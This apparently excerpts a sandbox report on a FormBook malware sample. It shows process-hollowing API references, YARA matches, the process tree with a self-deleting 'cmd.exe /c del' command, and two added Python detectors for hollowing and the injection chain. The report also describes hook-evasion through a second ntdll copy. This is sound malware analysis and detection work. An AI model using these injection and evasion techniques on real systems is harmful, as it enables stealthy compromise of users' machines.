  • 3_2_01999780 NtMapViewOfSection, LdrInitializeThunk
  • 3_2_019997A0 NtUnmapViewOfSection, LdrInitializeThunk
  • 3_2_01999710 NtQueryInformationToken, LdrInitializeThunk
  • 3_2_019996E0 NtFreeVirtualMemory, LdrInitializeThunk
  • 3_2_01999660 NtAllocateVirtualMemory, LdrInitializeThunk
  • 3_2_019999D0 NtCreateProcessEx
  • 3_2_01999950 NtQueueApcThread
  • 3_2_019998A0 NtWriteVirtualMemory
  • 3_2_01999820 NtEnumerateKey
  • 3_2_0199B040 NtSuspendThread
  • 3_2_0199A3B0 NtGetContextThread
  • 3_2_01999B00 NtSetValueKey
  • 3_2_01999A80 NtOpenDirectoryObject
  • 3_2_01999A10 NtQuerySection
  • 3_2_019995F0 NtQueryInformationFile
  • 3_2_0199AD30 NtSetContextThread
  • 3_2_01999520 NtWaitForSingleObject
  • 3_2_01999560 NtWriteFile
  • 3_2_01999FE0 NtCreateMutant
  • 3_2_0199A710 NtOpenProcessToken
  • 3_2_01999730 NtQueryVirtualMemory
  • 3_2_0199A770 NtOpenThread
  • 3_2_01999770 NtSetInformationFile
  • 3_2_01999760 NtOpenProcess
  • 3_2_019996D0 NtCreateKey
  • 3_2_01999610 NtEnumerateValueKey
  • 3_2_01999650 NtQueryValueKey
  • 3_2_01999670 NtQueryInformationProcess
The 0x0040xxxx functions are in the unpacked payload mapped at 0x400000. The 0x0199xxxx functions fall inside the region at 0x01930000 that carries the wntdll.pdb string listed above, consistent with the known FormBook habit of mapping a second copy of ntdll.dll and calling its Nt* stubs directly so that inline hooks placed in the loaded ntdll by security products are bypassed. Together NtCreateProcessEx, NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection, NtWriteVirtualMemory, NtGetContextThread, NtSetContextThread, NtQueueApcThread and NtResumeThread are the primitives behind the signatures "Sample uses process hollowing technique", "Modifies the context of a thread in another process" and "Queues an APC in another process".
Source: C:\Windows\SysWOW64\raserver.exe, Code functions (process 12; list truncated in this export):
  • 12_2_04B495D0 NtClose, LdrInitializeThunk
  • 12_2_04B49540 NtReadFile, LdrInitializeThunk
  • 12_2_04B496E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B496D0 NtCreateKey,LdrInitializeThunk,12_2_04B496D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49660 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04B49660
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49650 NtQueryValueKey,LdrInitializeThunk,12_2_04B49650
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49780 NtMapViewOfSection,LdrInitializeThunk,12_2_04B49780
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49FE0 NtCreateMutant,LdrInitializeThunk,12_2_04B49FE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49710 NtQueryInformationToken,LdrInitializeThunk,12_2_04B49710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49860 NtQuerySystemInformation,LdrInitializeThunk,12_2_04B49860
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49840 NtDelayExecution,LdrInitializeThunk,12_2_04B49840
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B499A0 NtCreateSection,LdrInitializeThunk,12_2_04B499A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49910 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_04B49910
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A50 NtCreateFile,LdrInitializeThunk,12_2_04B49A50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B495F0 NtQueryInformationFile,12_2_04B495F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4AD30 NtSetContextThread,12_2_04B4AD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49520 NtWaitForSingleObject,12_2_04B49520
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49560 NtWriteFile,12_2_04B49560
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49610 NtEnumerateValueKey,12_2_04B49610
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49670 NtQueryInformationProcess,12_2_04B49670
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B497A0 NtUnmapViewOfSection,12_2_04B497A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49730 NtQueryVirtualMemory,12_2_04B49730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4A710 NtOpenProcessToken,12_2_04B4A710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4A770 NtOpenThread,12_2_04B4A770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49770 NtSetInformationFile,12_2_04B49770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49760 NtOpenProcess,12_2_04B49760
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B498A0 NtWriteVirtualMemory,12_2_04B498A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B498F0 NtReadVirtualMemory,12_2_04B498F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49820 NtEnumerateKey,12_2_04B49820
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4B040 NtSuspendThread,12_2_04B4B040
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B499D0 NtCreateProcessEx,12_2_04B499D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49950 NtQueueApcThread,12_2_04B49950
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A80 NtOpenDirectoryObject,12_2_04B49A80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A20 NtResumeThread,12_2_04B49A20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A10 NtQuerySection,12_2_04B49A10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A00 NtProtectVirtualMemory,12_2_04B49A00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4A3B0 NtGetContextThread,12_2_04B4A3B0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49B00 NtSetValueKey,12_2_04B49B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9D50 NtCreateFile,12_2_00AA9D50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9E80 NtClose,12_2_00AA9E80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9E00 NtReadFile,12_2_00AA9E00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9F30 NtAllocateVirtualMemory,12_2_00AA9F30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9DA9 NtReadFile,12_2_00AA9DA9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9E7A NtClose,12_2_00AA9E7A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9F2D NtAllocateVirtualMemory,12_2_00AA9F2D
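The listing above shows both the re-launched sample (process 3) and the injected raserver.exe (process 12) referencing the complete process-hollowing primitive set from their own code: NtCreateProcessEx or NtOpenProcess to obtain a target, NtUnmapViewOfSection to carve out its image, NtMapViewOfSection / NtWriteVirtualMemory to place the payload, NtGetContextThread / NtSetContextThread or NtQueueApcThread to redirect execution, and NtResumeThread to start it. The script below is an added example and is not part of the report or of Joe Sandbox; it parses lines in the format printed above, collects the Nt* names each process references, and flags a process whose references cover every stage. The stage table is my own heuristic, and the input embeds a subset of the report's lines plus one constructed control line (pid 7, notepad.exe) that does not appear in the report.

```python
"""Score process-hollowing primitives from sandbox 'Code function' lines.
Added example, not part of the original report."""
import re
from collections import defaultdict

# Lines copied from the report (process 3 = re-launched sample, process 12 =
# injected raserver.exe) plus one CONSTRUCTED control line for pid 7 that is
# not in the report.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Code function: 3_2_01999A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Code function: 3_2_01999780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Code function: 3_2_019997A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Code function: 3_2_019999D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Code function: 3_2_01999950 NtQueueApcThread
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Code function: 3_2_019998A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Code function: 3_2_0199B040 NtSuspendThread
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Code function: 3_2_0199A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Code function: 3_2_0199AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\raserver.exe  Code function: 12_2_04B49780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\raserver.exe  Code function: 12_2_04B497A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\raserver.exe  Code function: 12_2_04B498A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\raserver.exe  Code function: 12_2_04B499D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\raserver.exe  Code function: 12_2_04B49950 NtQueueApcThread
Source: C:\Windows\SysWOW64\raserver.exe  Code function: 12_2_04B49A20 NtResumeThread
Source: C:\Windows\SysWOW64\raserver.exe  Code function: 12_2_04B4AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\raserver.exe  Code function: 12_2_04B49A00 NtProtectVirtualMemory
Source: C:\Windows\System32\notepad.exe  Code function: 7_2_00401000 NtClose,NtReadFile
"""

LINE_RE = re.compile(
    r"^Source:\s+(?P<image>\S+)\s+Code function:\s+"
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s+(?P<apis>[\w,]+)"
)

# Stages of a hollowing / thread-hijack injection (my heuristic, not the
# sandbox's).  Each stage lists alternatives; a process must hit all stages.
STAGES = {
    "obtain_target":   {"NtCreateProcessEx", "NtOpenProcess"},
    "carve_out_image": {"NtUnmapViewOfSection"},
    "write_payload":   {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "hijack_thread":   {"NtSetContextThread", "NtQueueApcThread"},
    "resume":          {"NtResumeThread"},
}


def parse(text):
    """Return {pid: set(Nt* names referenced)} for every 'Code function' line."""
    per_pid = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        # keep only native API names; drop LdrInitializeThunk and friends
        apis = {a for a in m["apis"].split(",") if a.startswith("Nt")}
        per_pid[int(m["pid"])] |= apis
    return dict(per_pid)


def stages_hit(apis):
    """Names of the injection stages covered by a set of Nt* references."""
    return {name for name, alts in STAGES.items() if apis & alts}


def flag_hollowing(per_pid):
    """PIDs whose Nt* references cover every stage, sorted ascending."""
    return sorted(pid for pid, apis in per_pid.items()
                  if stages_hit(apis) == set(STAGES))


if __name__ == "__main__":
    data = parse(SAMPLE_LINES)
    for pid in sorted(data):
        print(pid, sorted(stages_hit(data[pid])), len(data[pid]), "Nt* refs")
    print("flagged:", flag_hollowing(data))
```

With the embedded input, processes 3 and 12 are flagged and the control process is not. A process that references only NtCreateProcessEx and NtResumeThread is deliberately not flagged; the unmap, write and context/APC combination is what separates hollowing from an ordinary process launch. Note also that direct references to Nt* from a sample's own code, rather than through kernel32, are themselves worth a second look whenever they appear in a listing like this.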
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Code functions without resolved API references, process 0, run 2 (17 entries): 0_2_00B5FB20, 0_2_00B5C2B0, 0_2_00B594B0, 0_2_00B5F73D, 0_2_0B4E4E58, 0_2_0B4E8E6A, 0_2_0B4EBD68, 0_2_0B4E6578, 0_2_0B4EA52C, 0_2_0B4E4588, 0_2_0B4E4240, 0_2_0B4E8890, 0_2_0B4E88A0, 0_2_0B4E8E5E, 0_2_0B4E8EEC, 0_2_0B4E8C8C, 0_2_0B4E8C98
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Code functions without resolved API references, process 3, run 2 (42 entries): 3_2_0041D069, 3_2_00401030, 3_2_0041DA97, 3_2_0041D5C9, 3_2_00402D8D, 3_2_00402D90, 3_2_00409E2B, 3_2_00409E30, 3_2_0041DF79, 3_2_00402FB0, 3_2_019799BF, 3_2_0195F900, 3_2_01974120, 3_2_0196B090, 3_2_01A220A8, 3_2_019820A0, 3_2_01A228EC, 3_2_01A2E824, 3_2_01A11002, 3_2_0197A830, 3_2_0198EBB0, 3_2_0198ABD8, 3_2_01A1DBD2, 3_2_01A103DA, 3_2_01A22B28, 3_2_0197A309, 3_2_0197AB40, 3_2_01A222AE, 3_2_01A0FA2B, 3_2_01982581, 3_2_0196D5E0, 3_2_01A225DD, 3_2_01A22D07, 3_2_01950D20, 3_2_01A21D55, 3_2_0196841F, 3_2_01A1D466, 3_2_01A21FF1, 3_2_01A2DFCE, 3_2_01A22EF7, 3_2_01976E30, 3_2_01A1D616
Source: C:\Windows\SysWOW64\raserver.exe  Code functions without resolved API references, process 12, run 2 (44 entries): 12_2_04BC4496, 12_2_04B1841F, 12_2_04BCD466, 12_2_04B32581, 12_2_04BC2D82, 12_2_04B1D5E0, 12_2_04BD25DD, 12_2_04B00D20, 12_2_04BD2D07, 12_2_04BD1D55, 12_2_04BD2EF7, 12_2_04B26E30, 12_2_04BCD616, 12_2_04BD1FF1, 12_2_04BDDFCE, 12_2_04B320A0, 12_2_04BD20A8, 12_2_04B1B090, 12_2_04BD28EC, 12_2_04B2A830, 12_2_04BDE824, 12_2_04BC1002, 12_2_04B299BF, 12_2_04B24120, 12_2_04B0F900, 12_2_04BD22AE, 12_2_04BC4AEF, 12_2_04BBFA2B, 12_2_04B3EBB0, 12_2_04BB23E3, 12_2_04BC03DA, 12_2_04B3ABD8, 12_2_04BCDBD2, 12_2_04BD2B28, 12_2_04B2A309, 12_2_04B2AB40, 12_2_00AAD069, 12_2_00AADA97, 12_2_00A92D8D, 12_2_00A92D90, 12_2_00A99E2B, 12_2_00A99E30, 12_2_00A92FB0, 12_2_00AADF79
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Code function: String function: 0195B150 appears 87 times
Source: C:\Windows\SysWOW64\raserver.exe  Code function: String function: 04B0B150 appears 133 times
Source: XhU4EXUp0x.exe, 00000000.00000002.657834635.0000000005920000.00000004.00000001.sdmp  Binary or memory string: OriginalFilenameDSASignature.dll@ vs XhU4EXUp0x.exe
Source: XhU4EXUp0x.exe, 00000000.00000000.643332701.0000000000420000.00000002.00020000.sdmp  Binary or memory string: OriginalFilenameProfileOptimization.exe8 vs XhU4EXUp0x.exe
Source: XhU4EXUp0x.exe, 00000000.00000002.653237651.00000000009F0000.00000004.00000020.sdmp  Binary or memory string: OriginalFilenameclr.dllT vs XhU4EXUp0x.exe
Source: XhU4EXUp0x.exe, 00000003.00000002.707120497.0000000000F40000.00000002.00020000.sdmp  Binary or memory string: OriginalFilenameProfileOptimization.exe8 vs XhU4EXUp0x.exe
Source: XhU4EXUp0x.exe, 00000003.00000002.707570278.0000000001689000.00000040.00000001.sdmp  Binary or memory string: OriginalFilenameraserver.exej% vs XhU4EXUp0x.exe
Source: XhU4EXUp0x.exe, 00000003.00000002.708280098.0000000001BDF000.00000040.00000001.sdmp  Binary or memory string: OriginalFilenamentdll.dllj% vs XhU4EXUp0x.exe
Source: XhU4EXUp0x.exe  Binary or memory string: OriginalFilenameProfileOptimization.exe8 vs XhU4EXUp0x.exe
Source: XhU4EXUp0x.exe  Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source (type: MEMORY), both rules matched on each of: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp; 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp; 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp; 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp; 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp; 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp; 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp; 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp; 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp
Source (type: UNPACKEDPE), both rules matched on each of: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack; 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack; 3.2.XhU4EXUp0x.exe.400000.0.unpack; 3.0.XhU4EXUp0x.exe.400000.1.unpack
Source: XhU4EXUp0x.exe  Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine  Classification label: mal100.troj.evad.winEXE@7/1@2/2
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XhU4EXUp0x.exe.log
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Mutant created: \Sessions\1\BaseNamedObjects\zheXInonhS
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2216:120:WilError_01
Source: XhU4EXUp0x.exe  Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe  File read: C:\Windows\System32\drivers\etc\hosts
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp  Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp  Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp  Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp  Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp  Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp  Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp  Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp  Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp  Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: XhU4EXUp0x.exe  Virustotal: Detection: 21%
Source: XhU4EXUp0x.exe  ReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Users\user\Desktop\XhU4EXUp0x.exe 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess created: C:\Users\user\Desktop\XhU4EXUp0x.exe C:\Users\user\Desktop\XhU4EXUp0x.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
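The process tree above is the FormBook signature chain: the dropper starts a second copy of itself (the hollowed child), explorer.exe spawns a SysWOW64 system binary (raserver.exe here; the family picks one at random), and that binary runs `cmd.exe /c del` on the original file. The following is an added example, not code from the report or the sample, that flags those three links in process-creation events. The `ProcEvent` schema and all PIDs are constructed to mirror the tree shown in the report and do not correspond to a real EDR format.

```python
"""Added example: detect the FormBook-style execution chain recorded in the
report (self re-launch, explorer.exe -> SysWOW64 binary, cmd.exe /c del <dropper>)
from process-creation events.  Schema and PIDs are constructed, not a real EDR's."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # command line as logged


# Constructed events mirroring the report's "Process created" lines (PIDs invented).
SAMPLE_EVENTS = [
    ProcEvent(6968, 4000, r"C:\Users\user\Desktop\XhU4EXUp0x.exe", r"'C:\Users\user\Desktop\XhU4EXUp0x.exe'"),
    ProcEvent(7032, 6968, r"C:\Users\user\Desktop\XhU4EXUp0x.exe", r"C:\Users\user\Desktop\XhU4EXUp0x.exe"),
    ProcEvent(3220, 3100, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(6964, 3220, r"C:\Windows\SysWOW64\raserver.exe", r"C:\Windows\SysWOW64\raserver.exe"),
    ProcEvent(7100, 6964, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'"),
    ProcEvent(7120, 7100, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# `cmd /c del "<path>"` or `cmd /c del '<path>'`, with or without quotes.
DEL_RE = re.compile(r"""/c\s+del\s+['"]?(?P<target>[^'"]+?)['"]?\s*$""", re.IGNORECASE)
SYSWOW64 = "c:\\windows\\syswow64\\"


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_injection_chain(events):
    """Return (kind, parent_pid, child_pid, detail) tuples for each link of the chain found."""
    by_pid = {e.pid: e for e in events}
    images = {e.image.lower() for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue                      # root of the captured tree, nothing to compare
        # Link 1: a non-system binary starts a second copy of itself (hollowed child).
        if basename(e.image) == basename(parent.image) and not e.image.lower().startswith("c:\\windows\\"):
            findings.append(("self_relaunch", parent.pid, e.pid, e.image))
        # Link 2: explorer.exe (a shell, not a service host) spawns a SysWOW64 binary.
        if basename(parent.image) == "explorer.exe" and e.image.lower().startswith(SYSWOW64):
            findings.append(("explorer_spawns_syswow64", parent.pid, e.pid, e.image))
        # Link 3: cmd.exe deletes a file that is the image of another process in the tree.
        m = DEL_RE.search(e.cmdline) if basename(e.image) == "cmd.exe" else None
        if m and m.group("target").lower() in images:
            findings.append(("self_delete", parent.pid, e.pid, m.group("target")))
    return findings


def is_formbook_like_chain(findings) -> bool:
    """All three links present: relaunch, explorer -> SysWOW64 host, deletion of the dropper."""
    kinds = {f[0] for f in findings}
    return {"self_relaunch", "explorer_spawns_syswow64", "self_delete"} <= kinds


if __name__ == "__main__":
    found = find_injection_chain(SAMPLE_EVENTS)
    for f in found:
        print(f)
    print("FormBook-like chain:", is_formbook_like_chain(found))
```

Each link on its own is weak (installers re-launch themselves, explorer.exe legitimately starts programs the user clicks); the value is in requiring all three in one tree, with the deleted file being the image of an earlier process.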
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: XhU4EXUp0x.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: XhU4EXUp0x.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: XhU4EXUp0x.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\YfQkSBryuS\src\obj\Debug\ProfileOptimization.pdb source: XhU4EXUp0x.exe
          Source: Binary string: wntdll.pdbUGP source: XhU4EXUp0x.exe, 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, raserver.exe, 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: XhU4EXUp0x.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
          Source: Binary string: RAServer.pdbGCTL source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 0_2_00B5AC80 pushfd ; retn 0004h (0_2_00B5AC82)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 0_2_00B5ACD1 pushfd ; retn 0004h (0_2_00B5ACD2)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 0_2_00B5AC31 pushfd ; retn 0004h (0_2_00B5AC32)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 0_2_00B5B1C0 pushfd ; retn 0004h (0_2_00B5B1D2)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 0_2_00B53768 push eax; retn 0004h (0_2_00B53769)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 0_2_0B4E944C push esp; iretd (0_2_0B4E944E)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041D069 push esi; ret (3_2_0041D067)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_004080F7 pushad ; retf (3_2_004080FC)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_004169CD push ecx; iretd (3_2_004169D4)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_004169F6 push eax; iretd (3_2_004169F7)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041DA38 push esi; ret (3_2_0041D067)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0040E2FF push ds; retf (3_2_0040E326)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041DA97 push esi; ret (3_2_0041D067)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_00417ABB push ebx; iretd (3_2_00417ABC)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041833A push cs; retf (3_2_0041833D)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_004164C5 push es; retf (3_2_004164CA)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041D4FB push esi; ret (3_2_0041D067)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041D5C9 push esi; ret (3_2_0041D067)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041CEF2 push eax; ret (3_2_0041CEF8)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041CEFB push eax; ret (3_2_0041CF62)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041CEA5 push eax; ret (3_2_0041CEF8)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041CF5C push eax; ret (3_2_0041CF62)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041D7F1 push esi; ret (3_2_0041D067)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041CF89 push esi; ret (3_2_0041D067)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code function: 3_2_0041CF96 push esi; ret (3_2_0041D067)
